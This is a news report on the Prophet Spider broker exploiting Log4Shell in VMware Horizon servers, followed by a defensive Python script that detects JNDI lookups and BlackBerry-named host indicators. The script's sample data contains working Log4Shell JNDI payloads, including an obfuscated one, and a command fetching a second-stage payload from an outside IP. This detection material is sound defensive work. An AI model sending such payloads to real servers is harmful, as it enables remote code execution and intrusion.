Log4Shell Attacks on VMware Horizon Servers Involved an Initial Access Broker


Short News:-

An initial access broker group tracked as Prophet Spider has been linked to a set of malicious activities that exploit the Log4Shell vulnerability in unpatched VMware Horizon servers. BlackBerry observed instances of exploitation mirroring tactics, techniques, and procedures previously attributed to the Prophet Spider eCrime cartel. The group has been active since at least May 2017 and has previously exploited flaws in Oracle WebLogic servers to gain access to target environments. Earlier this month, Microsoft called out a China-based operator for deploying a new ransomware strain on Horizon systems.




Detailed News:-

An initial access broker group called Prophet Spider has been linked to a set of malicious activities that exploit the Log4Shell vulnerability in unpatched VMware Horizon servers.


According to new research published today by the BlackBerry Research & Intelligence and Incident Response (IR) teams, the threat actor has been exploiting the flaw to download a second-stage payload onto the targeted systems.


Among the payloads that have been found are cryptocurrency miners and Cobalt Strike Beacons. This is in line with a previous advisory from the U.K. National Health Service (NHS) that warned of active exploits of the vulnerabilities in VMware Horizon servers to drop malicious web shells and establish a foothold on affected networks for follow-on attacks.


"Log4Shell" is the name given to a bug in the popular Apache Log4j library that lets an attacker execute code on a server simply by getting it to log a specially crafted string. Since the flaw was made public last month, hackers have been quick to use it in a number of different intrusion campaigns to gain full control of affected servers.


BlackBerry said it saw tactics, techniques, and procedures (TTPs) that were similar to those used by the Prophet Spider eCrime cartel, such as the use of the "C:\Windows\Temp\7fde" folder path to store malicious files and the "wget.bin" executable to retrieve additional binaries, as well as the group's use of the same infrastructure.
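The two things a defender takes from the paragraphs above are the mechanism (a logged string that carries a JNDI lookup) and the host-side indicators BlackBerry names (the C:\Windows\Temp\7fde folder and the wget.bin downloader). The Python script below is an added example, not code from this article or from BlackBerry: it undoes the nested-lookup obfuscation attackers used to hide `${jndi:` from naive string matching, flags web-server log lines that carry a JNDI lookup, and flags process events whose image sits under the named folder or is named wget.bin. Every log line, IP address and process event in it is constructed for the example; the function names are the example's own.

```python
import ntpath
import re

# Constructed sample access-log lines (not from the BlackBerry report).
# Lines 2 and 3 carry a JNDI lookup; line 3 hides it behind ${lower:...}
# nesting, a common evasion of plain "${jndi:" matching.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Jan/2022:12:00:01 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Jan/2022:12:00:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Jan/2022:12:00:03 +0000] "GET /portal/?x=${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.12 - - [10/Jan/2022:12:00:04 +0000] "POST /broker/xml HTTP/1.1" 200 128 "-" "VMware Horizon Client"',
]

# Constructed sample process-creation events (hypothetical EDR export).
SAMPLE_PROCESS_EVENTS = [
    {"host": "horizon-01", "image": r"C:\Windows\System32\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
    {"host": "horizon-01", "image": r"C:\Windows\Temp\7fde\wget.bin", "cmdline": "wget.bin http://198.51.100.7/stage2"},
]

# Innermost ${...} with no nested lookup inside it.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup followed by its scheme (ldap, ldaps, rmi, dns, ...).
JNDI = re.compile(r"\$\{jndi:([a-z0-9+.-]+):", re.IGNORECASE)


def _resolve(body):
    """Evaluate one Log4j lookup body the way Log4j would, or None if unknown."""
    if body.startswith("::-"):          # ${::-j} -> "j" (empty key, default value)
        return body[3:]
    kind, _, rest = body.partition(":")
    kind = kind.lower()
    if kind == "lower":
        return rest.lower()
    if kind == "upper":
        return rest.upper()
    if ":-" in rest:                    # ${env:NOPE:-j} -> default value "j"
        return rest.split(":-", 1)[1]
    return None                         # leave jndi and unknown lookups intact


def normalize_lookups(text, max_rounds=20):
    """Resolve nested lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):
        changed = False

        def repl(match):
            nonlocal changed
            value = _resolve(match.group(1))
            if value is None:
                return match.group(0)
            changed = True
            return value

        text = INNER_LOOKUP.sub(repl, text)
        if not changed:
            break
    return text


def scan_log_line(line):
    """Return the JNDI scheme if the line carries a lookup, else None."""
    match = JNDI.search(normalize_lookups(line))
    return match.group(1).lower() if match else None


def flag_process_event(event):
    """Return the list of BlackBerry-named TTP indicators an event matches."""
    reasons = []
    image = event["image"].lower()
    if "\\windows\\temp\\7fde\\" in image:
        reasons.append("image under C:\\Windows\\Temp\\7fde")
    if ntpath.basename(image) == "wget.bin":
        reasons.append("wget.bin downloader")
    return reasons


def scan_all(log_lines=SAMPLE_LOG_LINES, events=SAMPLE_PROCESS_EVENTS):
    """Run both detections and return the hits as a dict for review or alerting."""
    log_hits = [(i, scheme) for i, line in enumerate(log_lines)
                if (scheme := scan_log_line(line))]
    host_hits = [(e["host"], e["image"], r) for e in events
                 if (r := flag_process_event(e))]
    return {"log": log_hits, "host": host_hits}


if __name__ == "__main__":
    for key, hits in scan_all().items():
        for hit in hits:
            print(key, hit)
```

The normalisation step matters more than the regex: a rule that only looks for the literal `${jndi:` misses the third sample line, while resolving `${lower:j}` first turns it back into the plain form. Resolution is deliberately limited to `lower`, `upper`, the `::-` empty-key trick and `:-` defaults, so it never reaches out to the environment or the network while evaluating untrusted input.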




The group mostly gains access to victims by compromising vulnerable web servers, CrowdStrike said in August 2021, when Prophet Spider was actively exploiting flaws in Oracle WebLogic servers to get into target environments. CrowdStrike added that the group used a variety of low-prevalence tools to achieve its operational goals.


As with many other initial access brokers, the footholds are sold to the highest bidder on underground dark web forums, and the buyers then use them to deploy ransomware. The group has been active since at least May 2017.


This isn't the first time Log4Shell flaws have been used to get into internet-facing systems running VMware Horizon. Earlier this month, Microsoft called out a China-based operator tracked as DEV-0401 for deploying a new ransomware strain called NightSky on compromised servers.


VMware has also asked its customers to apply the patches as soon as possible because of the attacks on Horizon servers. "The consequences of this vulnerability could be very bad for any system, especially ones that accept traffic from the open Internet," the virtualization service provider said.


It is a good sign that hackers are interested in exploiting a vulnerability that isn't very well known, said Tony Lee, vice president of global services technical operations at BlackBerry.


"It's likely that criminal groups will keep looking into the Log4Shell vulnerability, so it's an attack method that defenders need to be on the lookout for," Lee said.
